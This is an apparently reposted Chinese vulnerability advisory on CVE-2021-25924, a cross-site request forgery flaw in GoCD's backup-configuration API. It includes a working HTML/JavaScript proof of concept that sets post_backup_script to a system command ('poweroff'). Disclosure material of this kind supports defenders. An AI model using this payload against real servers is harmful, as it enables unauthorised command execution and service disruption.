微慑信息网

CVE-2021-25924 - POC

概述

Aravind SV gocd是Aravind SV开源的一个应用程序。

在 GOCD 中,由于在”/go/api/配置/备份”端点缺少 CSRF 保护,19.6.0 到 21.1.0 版本容易受到跨站点请求伪造的影响。攻击者可以诱使受害者点击恶意链接,该链接可能会更改备份配置或在post_backup_script字段中执行系统命令。

细节

模块”GoCD”可能因缺少”/go/api/配置/备份”端点的CSRF保护而被跨站点请求伪造滥用。由于此缺陷,攻击者可以诱使受害者更改备份配置设置,例如在post_backup_script字段中执行系统命令,并通过诱使用户点击攻击者控制的网站来更改备份计划。

PoC 细节

创建具有以下内容的文件。当经过验证的用户单击攻击者发送的恶意链接时,CSRF 请求将发送到合法服务器并更改备份配置。

PoC 代码

<html> 
<script> function backup() 
{ var xmlhttp = new XMLHttpRequest(); xmlhttp.withCredentials = true; xmlhttp.open("POST","http://localhost:8153/go/api/config/backup", true); 
xmlhttp.setRequestHeader("Accept","application/vnd.go.cd.v1+json"); 
xmlhttp.send(JSON.stringify({"schedule":null,"post_backup_script":"poweroff","email_on_success":false,"email_on_failure":false})); } 
backup();
</script> 
</html>

影响版本

19.6.0-21.1.0

原文链接

https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25924
赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2021-25924 - POC

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册